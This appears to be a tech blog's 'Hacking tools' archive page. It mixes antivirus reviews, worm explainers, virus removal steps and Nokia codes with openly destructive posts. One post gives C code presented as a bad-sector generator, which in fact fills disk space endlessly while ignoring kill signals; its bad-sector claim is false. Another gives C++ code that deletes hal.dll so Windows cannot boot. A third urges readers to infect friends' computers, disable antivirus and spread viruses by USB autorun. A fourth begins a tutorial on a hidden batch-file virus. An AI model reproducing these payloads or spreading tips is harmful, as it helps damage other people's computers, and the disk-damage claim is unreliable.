All about new technology update

New tech. updated daily so do visit the blog

New released tablets

news about the new Google nexus 7 ... mini Ipad ..and .. many more....

New apps reveiew

"No Flash Support In Android 4.1 Jelly Bean"

New technology development

Go to Verizon Announces FiOS Quantum With Speed Up To 300Mbps ...and many more

Tech giant Overcome by samsung

New update of all apple products from Iphone to Ipad, ipod to apple tv

Showing posts with label Hacking tools. Show all posts
Showing posts with label Hacking tools. Show all posts

Monday, November 4, 2013

How To Find Hidden Files And Folder

I think many of us must have faced the hurdle of finding windows system hidden files and folders. For example I always forget the path of the hosts file hidden somewhere in the windows folder. Whenever I wanted to configure this particular file I have to always look for it by turning on the show hidden files and folders option from the folder options, and going through most of the windows folders. I always thought there must be an easier way to do this stuff and

Friday, September 13, 2013

Msinus.com Hacked and Defaced

After the Syria attacks by the army  the hackers team from Syria has  hacked and defaced  the well known site named "www.msinus.com" by
"SeCuR!TY L!0NS H4CK3RS T34M ". And they have also posted photos Syria attack and many videos .This message was for the US government who made the attacks.
Also they have posted a message  as below

SeCuR!TY ** DR@G0N
I Hack This Site To Convert A message From Syria To the World
We don't attack any one, we just defend on our country and ourlselves
In respone to your government's support of terrorist cells, Located in several cities in Syria, kidnap and kill Syrians, and implement the most heinous massacres, Sush as the Hula massacre with killed 108 perople, include 50 children, mostly under the age of ten
We Hack this Site as a clear message that we send by the name of the great Syrian people to the Government of your country
Stop killing the Syrians because history will not forgive and will never foget
We Are All With our leader Bahsar Al-Asaad
----------------------------------------------
>>> SeCuR!TY L!0NS H4CK3RS T34M <<<

This hack was message to syrian army from the hackers team .

Saturday, February 23, 2013

Microsoft hacked by same cyberattack as Apple and Facebook

Microsoft has revealed it is the latest high-profile internet company to have its computer system hacked.


Microsoft says it has become the latest major internet company to be targeted by hackers 


The software giant said it experienced a "security intrusion"

Facebook hackers attack Apple


Apple computers were attacked by the same hackers who recently targeted Facebook, but no data appeared to have been stolen, the company said in an unprecedented admission of a widespread cyber-security breach.

Apple, which makes the iPhone, said it would release a software tool to protect customers against the malicious software used in the attacks.

Facebook hacked in 'sophisticated' attack

Facebook has revealed it has been targeted a "sophisticated attack" by hackers who exploited a previously unknown loophole in its computer system.

The internet company insisted that no personal information of users had been compromised by the hacking attack.
It said that malware had infected its computer systems after employees had visited the website of a developer of mobile applications  that was

Saturday, February 2, 2013

Blind SQL Injection vulnerability in PayPal Notifications website

An Indian Security Researcher Prakhar Prasad has discovered a Blind SQL Injection vulnerability in Paypal Notifications website(paypal-notify.com) that allowed

Sunday, August 19, 2012

How to use Google Voice on Nexus 7 for making Free Calls in US ? – Nexus 7 Hack


Google Nexus 7 android tablet, special of its kind as it doesn’t support any call facility as HSPA or LTE data connectivity options are missing. As Nexus 7 is not like other tablets as we see in market like Samsung Galaxy Tab which supports making call facilities instead of that, Nexus 7 is a very basic android tablet which allows you to surf internet, play games, email your contacts, video chats on Skype/Gtalk. Supporting only Wi-Fi services, Nexus 7

Tuesday, June 5, 2012

Speed Up Your Web Browsing In A Few Clicks: A Brief Introduction To DNS




Every millisecond counts when you’re browsing the web, and if you’d like to eke a bit more speed out of your internet connection, you can change your DNS server to make those

Thursday, May 10, 2012

Secure your Computer by Sticky Key Attack

Hello Guys,
This Time I wanna tell you some more about the Sticky keys  Attack  i.e totally about making a backdoor  in other system by replacing sethc.exe file with cmd.exe and after that u have to press Shift key 5 times on login screen and you get the cmd or command Prompt on login screen and run the ‘net user ’ command to change the password  of administrator or any account in the system. This is all about the attack, now how can I Secure my system by this attack for that you have to fallow few steps  as fallowing:
Windows XP:
  1. Check for sticky key backdoor

Nokia Mobile Phone HACK Codes

1.  Imagine ur cell battery is very low, u r expecting an important call and u don’t have a charger.
     Nokia instrument comes with a reserve battery. To activate, key is “*3370#”
     Ur cell will restart with this reserve and ur instrument will show a 50% increase in battery.
     This reserve will get charged when u charge ur cell next time.
     *3370# Activate Enhanced Full Rate Codec (EFR)-Your phone uses the best sound quality but talk time    is reduced by approx 5%
     #3370# Deactivate Enhanced Full Rate Codec( EFR)
     *#4720# Activate Half Rate Codec – Your phone uses a lower quality sound but you should gain approx 30% more Talk Time
     *#4720# Deactivate Half Rate Codec
2.  *#0000# Displays your phones software version,
      1st Line :  Software Version,
      2nd Line : Software Release Date,
      3rd Line : Compression Type
3.  *#9999# Phones software version if *#0000# does not work.
4.  *#06# For checking the International Mobile Equipment Identity (IMEI Number).
5.  #pw+1234567890+1# Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).
6.  #pw+1234567890+2# Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).
7.  #pw+1234567890+3# Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).
8.  #pw+1234567890+4# SIM Card Lock Status.(use the “*” button to obtain the “p,w” and “+” symbols).
9.  *#147# (vodafone) this lets you know who called you last *#1471# Last call (Only vodofone).
10.  *#21# Allows you to check the number that “All Calls” are diverted to.
11.  *#2640# Displays security code in use.
12.  *#30# Lets you see the private number.
13.  *#43# Allows you to check the “Call Waiting” status of your phone.
14.  *#61# Allows you to check the number that “On No Reply” calls are diverted to.
15.  *#62# Allows you to check the number that “Divert If Unreachable(no service)” calls are diverted to.
16.  *#67# Allows you to check the number that “On Busy Calls” are diverted to.
17.  *#67705646# removes operator logo on 3310 & 3330
18.  *#73# Reset phone timers and game scores
19.  *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible
20.  *#7760# Manufactures code
21.  *#7780# Restore factory settings
22.  *#8110# Software version for the nokia 8110
23.  *#92702689# (to remember *#WARRANTY#)
      Displays -
      1. Serial Number,
      2.Date Made
      3.Purchase Date,
      4.Date of last repair (0000 for no repairs),
      5.Transfer User Data.
      To exit this mode -you need to switch your phone off then on again
24.  *#94870345123456789# Deactivate the PWM-Mem
25.  **21*number# Turn on “All Calls” diverting to the phone number entered
26.  **61*number# Turn on “No Reply” diverting to the phone number entered
27.  **67*number# Turn on “On Busy” diverting to the phone number entered
  Each command is prefixed with either one or two * or # characters as follows:
   ** Register and Activate
   * Activate  
    ## De-Register (and Deactivate)
    # Deactivate
    *# Check Status
    © Call button
Once each command has been entered, if it is a network command (as opposed to a local handset command) it must be transmitted to the network by pressing the YES (receiver) key which acts as an enter key – this is represented here with the © character. Always enter numbers in full international format +CountryAreaNumber ( e.g. +447712345678).
Security
Change call barring code **03*OldCode*NewCode*NewCode#©
Change call barring code **03*330*OldCode*NewCode*NewCode#©
Change PIN code **04*OldPIN*NewPIN*NewPIN#©
Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#©
Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#©
Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#©
Display IMEI *#06#
Call Forwarding (Diversions)
De-register all call diversions ##002#©
Set all configured call diversions to number and activate **004*number#©
De-register all configured call diversions (no answer, not reachable, busy) ##004#©
Unconditionally divert all calls to number and activate **21*number#©
Activate unconditionally divert all calls *21#©
De-register unconditionally divert all calls ##21#©
Deactivate unconditionally divert all calls #21#©
Check status of unconditionally divert all calls *#21#©
Divert on no answer to number and activate **61*number#©
Activate divert on no answer *61#©
De-register divert on no answer ##61#©
Deactivate divert on no answer #61#©
Check status of divert on no answer *#61#©
Divert on not reachable to number and activate **62*number#©
Activate divert on not reachable *62#©
De-register divert on not reachable ##62#©
Deactivate divert on not reachable #62#©
Check status of divert on not reachable *#62#©
Divert on busy to number and activate  **67*number#©
Activate divert on busy *67#©
De-register divert on busy ##67#©
Deactivate divert on busy #67#©
Check status of divert on busy *#67#©
Change number of seconds of ringing for the given service before diverting a call (such as on no answer). Seconds must be a value from 5 to 30. De-registering the same divert will also delete this change! **service*number**seconds#© (Service numbers, see below)
Call barring
Activate barring all outgoing calls (see Security to set code) **33*code#©
Deactivate barring all outgoing calls #33*code#©
Check status of barring all outgoing calls *#33#©
Activate barring all calls **330*code#©
Deactivate barring all calls #330*code#©
Check status of barring all calls *#330*code#©
Activate barring all outgoing international calls **331*code#©
Deactivate barring all outgoing international calls #331*code#©
Check status of barring all outgoing international calls *#331#©
Activate barring all outgoing international calls except to home country **332*code#©
Deactivate barring all outgoing international calls except to home country #332*code#©
Check status of barring all outgoing international calls except to home country *#332#©
Activate barring all outgoing calls **333*code#©
Deactivate barring all outgoing calls #333*code#©
Check status of barring all outgoing calls *#333#©
Activate barring all incoming calls **35*code#©
Deactivate barring all incoming calls #35*code#©
Check status of barring all incoming calls *#35#©
Activate barring all incoming calls when roaming **351*code#©
Deactivate barring all incoming calls when roaming #351*code#©
Check status of barring all incoming calls when roaming *#351#©
Activate barring all incoming calls **353*code#©
Deactivate barring all incoming calls #353*code#©
Check status of barring all incoming calls *#353#©
Call waiting
Activate call waiting *43*#©
Deactivate call waiting #43##©
Check status of call waiting *#43#©
Calling Line Identification
The following only works if CLIP and CLIR are enabled (ask your service provider)
CLIP: Presentation of the number of the incoming call
Activate CLIP **30#©
Deactivate CLIP ##30#©
Check status of CLIP *#30#©
CLIR: Presentation of one’s own number to the to the called party
Activate CLIR **31#©
Activate CLIR for the actual call *31#number©
Deactivate CLIR ##31#©
Deactivate CLIR for the actual call #31#number©
Check status of CLIR *#31#©
COLP: Presentation of the actual number reached (if number called was diverted to another number
Activate COLP *76#©
Deactivate COLP #76#©
Check status of COLP *#76#©
COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone)
Activate COLR *77#©
Deactivate COLR #77#©
Check status of COLR *#77#©

Monday, April 30, 2012

Firewall administration




                                                                         Firewall


In my previous two articles I showed you how to secure your LAN and WLAN. In that i had mentioned the firewall factor. In this article I am going to show you the uses of firewall and its administration. Firewall Administration is ensuring the proper management, configuration, and change management of it.It is comprised of controlling access to the platform, platform operating system builds, log reviews, time synchronization and backups.Hence firewall is very important in a network. Some of the advantages and uses of firewall are as follows.
  • The main and the most important factor of firewall is your computer security. It gives a sence of a secure connection of your computer.
  • The most inexpensive and security tool.
  • You can monitor incoming and outgoing security alerts and the firewall company will record and track down an intrusion attempt depending on the severity.
  • Some firewalls are also useful as they detect viruses and worms.
  • All firewalls can be tested for effectiveness by using products that test for leaks or probe for open ports.
What is firewall administration ?
Personal firewall software is designed to prevent connections between the network and your computer, except for programs that the firewall software knows that they are not infected.
  • Network Magic needs to make network connections to set up sharing and check for updates, your firewall software needs to allow these connections.
  • Network Magic is permitted to make outbound communications.
  • Inbound communication from other computers running Network Magic is permitted to get past the firewall to Network Magic.
  • Outgoing communication: Most software firewalls have settings for specific program control.
As we say that any coin has two opposite sides firewall also consists of some of the disadvantages like:
  • Firewalls cannot protect you from internal sabotage within a network or from allowing other users access to your PC.
  • Firewalls cannot edit indecent material like pornography, violence, drugs and bad language. This would require you to adjust your browser security options or purchase special software to monitor your childcare’s Internet activity.

The 10 Best Free Anti-Virus Programs




This article really needs no introduction. There are many free anti-virus programs on the market, and you want to sort the wheat from the chaff. Fair enough. Documented here are the 10 best antivirus programs on the market.
While I won’t attempt to rank the programs here (in many ways the programs can’t be compared), I will attempt to give you an idea of under what circumstances they will be useful.
The order here for the 10 best antivirus programs  is mostly random, so be sure to read every entry if you want an idea of what will work for you.

Microsoft Security Essentials

10 best antivirus programs
Released by Microsoft in late 2009, Microsoft Security Essentials sports more than a typically verbose Microsoft name: it’s also a really good antivirus. Lightweight enough to run on older machines without crippling their performance, yet competent enough to handle most viruses and malware out there.
Perhaps the best part of MSE is its simplicity. As you can see, the user interface is really clear, with large buttons for the most basic functions. This is important if you’re setting it up on a computer for someone who is not computer-savvy.
Finally, MSE is completely free – there’s no professional version you can upgrade to. In fact, it’s even permissible to use in business situations, meaning you can use it at work without breaking the law. This alone sets it above most of the other selections for the 10 best antivirus programs.
 download MSE here.

AVG Free

This one recently topped our Movers and Shakers list of the top downloaded free anti-virus programs. But just because AVG is popular doesn’t mean it’s not great.
AVG has become synonymous with free anti-virus, and there’s a reason for this: AVG offers complete malware protection, with considerably less bloat than the top pay-to-use antivirus clients. And while AVG Free does constantly remind you that you could pay for the professional version of the program, it does this without ever getting in the way of the program’s core purpose: protecting you from viruses.
10 best antivirus programs
Though when it comes to upgrading one version of AVG to another, you need to make sure you’re good at reading what’s on screen, because the free download is only available via a tiny link at the bottom of the screen””the site really wants you to get the paid version. When upgrading to version 9 recently, for example, check out how hidden the free download was:
10 best antivirus programs
Not exactly a big link, is it? Figure this minor inconvenience out, however, and AVG is a a really good free anti-virus. Download AVG.

Avira Free

free antivirus programs
In terms of simplicity, Avira’s right up there with MSE. It’s fairly lightweight, too, so the comparison is quite apt. While Avira does have a paid professional version to peddle, much like AVG, it’s not quite as aggressive as AVG in peddling it. I’d say Avira is solid and worth looking into for sure. Download Avira Free here.

Avast! Free

If this competition were for the coolest name, the piratey Avast! would win hands down. Even though that’s not what we’re discussing, Avast! stands up pretty well. This is one of the top free anti-viruses on the market, and for good reason: it’s remarkably complete. Expect great all-around protection, including against trojans and spyware. You can also expect constant reminders that there’s a free version you can upgrade to, on your desktop and in your inbox. Still, the protection is solid.
Download Avast! here.

Malwarebytes

free antivirus programs
Whatever your default anti-virus is, you need Malwarebytes too. This program doesn’t run in your system background and constantly protect you, but when you run into a problem running Malwarebytes will usually take care of what other programs can’t. I’ve saved more than a few unbootable systems by running Malwarebytes from safe mode. This program takes care of any form of malware you throw at it, so keep it around. In fact, I’d keep this one on your flash drive in case you ever need to fix a computer for a friend (and if you’re reading this blog, you probably will).
Download Malwarebytes.

ComboFix

Consider this the nuclear option. If you know you’ve got a virus, but your usual anti-virus program can’t handle it, and Malwarebytes can’t handle it, it’s time for ComboFix. This program isn’t friendly: it runs from a command window and is proud of it.  And this is not a program you should use if you don’t know what you’re doing, because it can have devastating effects in the hands of the uneducated. But when all else fails, ComboFix delivers. Every geek should have this one on their keychain.
Download Combofix.

Clamwin

free antivirus programs
Clamwin is the Windows version of ClamAV, the main Linux anti-virus on the market. ClamWin is flawed in many ways: it simply scans instead of offering real-time protection, it doesn’t really do non-virus malware and it’s not exactly easy to use. Still, having ClamWin around doesn’t cost anything, and you can never have enough scanning tools in your arsenal.
Download ClamWin and see if you like it.

Panda Cloud AntiVirus

totally free antivirus programs
At first I thought the idea of a cloud-based antivirus was stupid, because it would only work while I’m online. Then it occurred to me: why the heck do I need an anti-virus when I’m offline?
As the name suggests, Panda Cloud Antivirus stores its virus definitions online. There’s an upside to this: your definitions are always up to date. There’s a downside, too, however: your anti-virus is constantly making use of your network connection.
I’d say this is a really good idea for underpowered PCs with constant access to the net. Like, say, a netbook. But if you’ve got a netbook you shouldn’t be using Windows anyway; switch to Jolicloud and you’ll have a functional netbook operating system immune to practically every virus.
 download Panda Cloud Antivirus if you’re interested.

Comodo Firewall + Antivirus

Comodo is best known for its free firewall, but it also offers a bundled firewall and antivirus program. While the Comodo firewall isn’t the easiest to use, and the antivirus doesn’t include protection for non-virus forms of  malware, this one’s worth mentioning if you’re looking for a free security suite which includes both a firewall and anti-virus protection.
totally free antivirus programs
Download Comodo Free here.

Common Sense 2011

This one’s unusual in that it’s free and considered by far the best protection out there, yet can’t be downloaded anywhere. Without it, however, even the best security software is rendered useless.
If you haven’t already figured this out, Common Sense 2011 isn’t a product you can download so much as it is a state of mind. If you’re going to be free of viruses and malware you need to use your head while browsing the web. The most important thing to remember is this: if something sounds too good to be true, it probably is””and your computer will probably be compromised.
Free porn usually isn’t. Warez are best to be avoided altogether. Nigerians that need your help transferring money are never actually princes or princesses. You get the idea: avoid shady sites online and you’ll find you’ll get far less malware on your machine.

Conclusion

There are a lot of great free anti-virus programs out there, but what you use is mostly a matter of preference. Myself, I use Microsoft Security Essentials on my Windows machine because it’s free, lightweight and will never ask me for money. But I also make sure I always have Malwarebytes on my thumb drive for quickly removing viruses and malware from the computers of friends and family.
What about you? Which free anti-virus do you prefer? Commenting is good for you, so do so!

Wednesday, April 18, 2012

Damage Hard Disk

This program will create Bad Sectors on HDD and in turn it will damage the hard disk.

(Use at your own risk)

#include
#include
#include
#include
#include
#include
#include

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}

How to Access SOPA Banned Sites

Best trick booming all over the world!!!!

If SOPA Act comes of act. Surly lot of sites are gonna be banned. Surly a long list sites will be under SOPA act. List of sites will be from categories like torrents, warez, social networking sites, news sites, sharing sites, file upload sites, search engines, live streaming channels, televesion channels, shopping sites, even proxies etc....





Here is a Trick to Unblock SOPA Banned Sites
We can't browse sites via there human simplified domian example: hackersreunited.net.
But we can browse the sites via the ip address. example: 234.45.35.8


How to Unblock Blacklisted SOPA Sites in Windows
  • Click Windows Key + R
  • Enter cmd.exe and click Ok
  • Command Program will open. Type ping [space] www.sample.com
  • Replace www.sample.com with the site you want to browse
  • Type the full address of the site you want to browse for example: http://enggcoded.blogspot.in/

How to Unblock Blacklisted SOPA Sites in Ubuntu/Linux


  • Click Application » Accessories » Terminal
  • Terminal will open. Type ping [space] www.sample.com
  • Replace www.sample.com with the site you want to browse
  • Type the full address of the site you want to browse for example: http://enggcoded.blogspot.in/

Some IP Address of Famous Sites

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
        tumblr.com 174.121.194.34
        wikipedia.org 208.80.152.201

        # News
        bbc.co.uk 212.58.241.131
        aljazeera.com 198.78.201.252

        # Social media
        reddit.com 72.247.244.88
        imgur.com 173.231.140.219
        google.com 74.125.157.99
        youtube.com 74.125.65.91
        yahoo.com 98.137.149.56
        hotmail.com 65.55.72.135
        bing.com 65.55.175.254
        digg.com 64.191.203.30
        theonion.com 97.107.137.164
        hush.com 65.39.178.43
        gamespot.com 216.239.113.172
        ign.com 69.10.25.46
        cracked.com 98.124.248.77
        sidereel.com 144.198.29.112
        github.com 207.97.227.239

        # Torrent sites
        thepiratebay.org 194.71.107.15
        mininova.com 80.94.76.5
        btjunkie.com 93.158.65.211
        demonoid.com 62.149.24.66
        demonoid.me 62.149.24.67

        # Social networking
        facebook.com 69.171.224.11
        twitter.com 199.59.149.230
        tumblr.com 174.121.194.34
        livejournal.com  209.200.154.225
        dreamwidth.org  69.174.244.50

        # Live Streaming Content
        stickam.com 67.201.54.151
        blogtv.com 84.22.170.149
        justin.tv 199.9.249.21
        chatroulette.com 184.173.141.231
        omegle.com 97.107.132.144
        own3d.tv 208.94.146.80 
        megavideo.com 174.140.154.32

        # Television
        gorillavid.com 178.17.165.74
        videoweed.com 91.220.176.248
        novamov.com 91.220.176.248
        tvlinks.com 208.223.219.206
        1channel.com 208.87.33.151

        # Shopping
        amazon.com 72.21.211.176
        newegg.com 216.52.208.187
        frys.com 209.31.22.39

        # File Sharing
        mediafire.com 205.196.120.13
        megaupload.com 174.140.154.20
        fileshare.com 208.87.33.151
        multiupload.com 95.211.149.7
        uploading.com 195.191.207.40
        warez-bb.org 31.7.57.13
        hotfile.com 199.7.177.218
        gamespy.com 69.10.25.46
        what.cd 67.21.232.223
        warez.ag 178.162.238.136
        putlocker.com 89.238.130.247
        uploaded.to 95.211.143.200
        dropbox.com 199.47.217.179
        pastebin.com 69.65.13.216

DOWNLOAD DEADLY VIRUSES

DOWNLOAD DEADLY VIRUS TO INFECT YOUR FRIENDS COMPUTER OR ANY VICTIMS COMPUTER  THIS VIRUS ARE HIGHLY DANGEROUS DOWNLOAD THIS VIRUS TO BREAKDOWN YOUR FRIENDS COMPUTER


Virus is a self-duplicating computer program that spreads from computer to computer. I recomment you not to use on your computer it will do serious damage. Viruses can delete or change files, steal important information, load and run unwanted applications and etc


NOTE : FIRST DISABLE YOUR PC ANTIVIRUS
DOWNLOAD THE ZIP FILES AND EXTRACT DO NOT OPEN THE EXE ON YOUR PC
BELOW THERE ARE LINKS DIRECT LINKS TO DOWNLOAD


TIPS : COPY THIS TO YOUR PEN DRIVE AND GIVE AUTORUN TO THIS VIRUS


TO CREATE AUTORUN OPEN NOTEPAD AND TYPE LIKE BELOW AND SAVE IT ON YOUR PEN DRIVE HOMEPAGE AS AUTORUN.INF AND YOU CAN HIDE THIS VRUS AND AUTORUN FILE BY HIDE OPTION IN PROPERTIES
[autorun]
open=YOUR VIRUS FILE NAME WITH EXTENSION

Brontok Virus

Brontok Virus

The Brontok Virus is a computer worm that affects computers running Microsoft Windows. It spreads by sending itself to email addresses harvested from the affected computer. But Now you can Remove it on your Own. It Really works! And now you can have a good sleep because now you will be able to remove the most sticky virus "The Brontok Virus".


- Start ur computer in safe mode with command prompt and type the following command to enable registry editor:-

reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
and run HKLM\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"

- After this your registry editor will be enabled

- Now type explorer

- Goto Run and type regedit

- Then follow the following path :-

HKLM\Software\Microsoft\Windows\Currentversion\Run

on the right side delete the entries which contain 'Brontok' and 'Tok-' words.

- After that restart your system

- Now open registry editor and follow the path to enable folder option in tools menu

HKCU\Software\Microsoft\Windows\Currentversion\Policies\Explorer\ 'NoFolderOption'
delete this entry and restart ur computer

- Now search *.exe files in all drives (search in hidden files also)
remove all files which are display like as folder icon.

Congratulations! Now your computer is completely free from Brontok Virus

HOW SAFE IS YOUR COMPUTER ???

HOW SAFE IS YOUR COMPUTER ???

pc-security.jpg
Security Facts about an average computer user
  • 70% users Install a lot of softwares or games which he finds interesting.
  • 80%of the user are not ready to update their system with latest patches.
  • 60% of the user don’t know if there system is secure.
  • 70% user don’t know how to find if the system is really secure




So how do you find if your system is secure and patched with latest patches and updates. Security System Analyzer (SSA) is a tool designed to check your system for the latest security updates. This tool can scan your system and find out the vulnerabilities about the missing patches and updates and provide you a link from where to get.
Features of SSA
  1. Finds security vulnerabilities and the missing patches for windows.
  2. Gives a direct link to possible patches to be used to remove the security hole.
  3. Supports Windows 2000, XP, Vista.
  4. One click to get the information about latest security vulnerabilities and others.
  5. Generates HTML reports which makes view easy and can be exported.
Open Vulnerability and Assessment Language (OVAL) is an international, information security, community standard to promote open and publicly available security content, and to standardize the transfer of this information across the entire spectrum of security tools and services. OVAL includes a language used to encode system details, and an assortment of content repositories held throughout the community.
ssa-startup.png
How SSA works?
This software completes the whole process in 3 steps:
  1. Representing configuration information of systems for testing;
  2. Analyzing the system for the presence of the specified machine state (vulnerability, configuration, patch state, etc.)
  3. Reporting the results of this assessment
ssa-update.png
Resources

Monday, April 16, 2012

YOUR OWN C++ VIRUS THE MOST POWERFULL

YOUR OWN C++ VIRUS THE MOST POWERFULL
This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.

The Original Code:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:

Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

HOW DO WORMS SPEARD ????

HOW DO WORMS SPEARD ????

People use e-mail more than any other application on the internet, but it can be a frustrating experience, with spam and especially e-mail worms filling our inboxes.

Worms can spread rapidly over computer networks, the traffic they create bringing those networks to a crawl. And worms can cause other damage, such as allowing unauthorized access to a computer network, or deleting or copying files.

What's a worm?

A worm is a computer virus designed to copy itself, usually in large numbers, by using e-mail or other form of software to spread itself over an internal network or through the internet.



How do they spread?

When you receive a worm over e-mail, it will be in the form of an attachment, represented in most e-mail programs as a paper clip. The attachment could claim to be anything from a Microsoft Word document to a picture of tennis star Anna Kournikova (such a worm spread quickly in February 2001).

If you click on the attachment to open it, you'll activate the worm, but in some versions of Microsoft Outlook, you don't even have to click on the attachment to activate it if you have the program preview pane activated. Microsoft has released security patches that correct this problem, but not everyone keeps their computer up to date with the latest patches.

After it's activated, the worm will go searching for a new list of e-mail addresses to send itself to. It will go through files on your computer, such as your e-mail program's address book and web pages you've recently looked at, to find them.

Once it has its list it will send e-mails to all the addresses it found, including a copy of the worm as an attachment, and the cycle starts again. Some worms will use your e-mail program to spread themselves through e-mail, but many worms include a mail server within their code, so your e-mail program doesn't even have to be open for the worm to spread.

Other worms can use multiple methods of spreading. The MyDoom worm, which started spreading in January 2004, attempted to copy infected files into the folder used by Kazaa, a file-sharing program. The Nimda worm, from September 2001, was a hybrid that had four different ways of spreading.
What do they do?

Most of the damage that worms do is the result of the traffic they create when they're spreading. They clog e-mail servers and can bring other internet applications to a crawl.

But worms will also do other damage to computer systems if they aren't cleaned up right away. The damage they do, known as the payload, varies from one worm to the next.

The MyDoom worm was typical of recent worms. It opened a back door into the infected computer network that could allow unauthorized access to the system. It was also programmed to launch an attack against a specific website by sending thousands of requests to the site in an attempt to overwhelm it.

The target of the original version of MyDoom attack was the website of SCO Group Inc., a company that threatened to sue users of the Linux operating system, claiming that its authors used portions of SCO's proprietary code. A second version of MyDoom targeted the website of software giant Microsoft.

The SirCam worm, which spread during the summer of 2001, disguised itself by copying its code into a Microsoft Word or Excel document and using it as the attachment. That meant that potentially private or sensitive documents were being sent over the internet.
How do I get rid of them?

The best way to avoid the effects of worms is to be careful when reading e-mail. If you use Microsoft Outlook, get the most recent security updates from the Microsoft website and turn off the preview pane, just to be safe.

Never open attachments you aren't expecting to receive, even if they appear to be coming from a friend. Be especially cautious with attachments that end with .bat, .cmd, .exe, .pif, .scr, .vbs or .zip, or that have double endings. (The file attachment that spread the Anna Kournikova worm was AnnaKournikova.jpg.vbs.)

Also, install anti-virus software and keep it up to date with downloads from the software maker's website. The updates are usually automatic.

Users also need to be wary of e-mails claiming to have cures for e-mail worms and viruses. Many of them are hoaxes that instruct you to delete important system files, and some carry worms and viruses themselves.

As well, some users should consider using a computer with an operating system other than Windows, the target of most e-mail worms. Most of the worms don't affect computers that run Macintosh or Linux operating systems.

MAKE YOUR OWN VIRUS BY MAKING YOU OWN BATCH FILE

MAKE YOUR OWN VIRUS BY MAKING YOU OWN BATCH FILE



It’s always been this way that we fellows be the good guys and save the day fighting malware threats… But as they say, you need to think like a criminal to catch one! And so we do the same, to understand how a malware works, how does it gains access, gains control, we will our self make a batch file based virus. A little knowledge of programming, just to extent how we do it, and knowledge of windows registry is a prerequisite.
Batch files, characterised by their .bat extension, are files containing a sequence of DOS commands that gets executed when the batch file is run. This allows you to make simple programs that perform simple tasks under limitations of DOS shell. Though higher level languages like BASIC, PASCAL and C interacts with system on lower level, batch file processing is a good start to understand malware.
The kind of malware that we are going to learn to make is one that will perform a simple task of changing desktop wallpaper, interchanging the left and right mouse keys, changing start page of internet explorer(6), and make a start-up entry so that it starts every time system starts. Though this sounds like a simple task, automation of this procedure such that it works on a single wrong click by user and runs all tasks without any confirmation and hidden is a tough job when started from scratch.
The components of the virus will be a main executable file, under cover of some attractive icon, which on execution extracts in background to a batch file and the wallpaper, then runs the batch file.
Before code, let’s learn a few basics, first on creation on batch files. These aren’t any special files created by some special applications. They are simple notepad files, where in code is written and then its extension changed to .bat. They run simple tasks like MOVE, COPY, RENAME etc , a few moderate tasks like changing file attributes ( i.e. making a file hidden, giving system attribute or removing the attributes) and a few complex tasks like altering a system registry without user intermission. The main draw back in a batch file is that it doesn’t remain active in memory (though we can make it by some loop), it just performs the stated tasks and shuts down. Hence, it can act as a trigger, and not the process itself.
Now, let’s learn a few commands of batch files. Though a basic knowledge of DOS is crucial, if not, you can still follow what’s going on. Starting with a simple rename command, the syntax is-
RENAME [Drive]: [path] filename1 filename2
Example:             RENAME C:\documents and settings\aijaz.txt gyaan.dat
Hence we see we can change the extension of file as well. If the path and drive of file aren’t specified, it is assumed that the file is in the current directory where from CMD is running.
Example:             RENAME aijaz.txt gyaan.dat
This command searches a file name aijaz.txt in current directory and renames it to gyaan.dat.
Coming to MOVE command, it moves the file from one path to another. It is like cut and paste. The syntax is-
MOVE [/Y |/-Y] [drive] [path] filename destination
The /Y attribute assigned allows CMD to overwrite files without confirmation, hence maintaining cover from user.
Example: MOVE /Y C:\aijaz.txt D:\
This moves the file aijaz.txt to drive D: . While moving a file, if source path isn’t mentioned, then it is assumed that the file is in current directory. But destination path is mandatory.
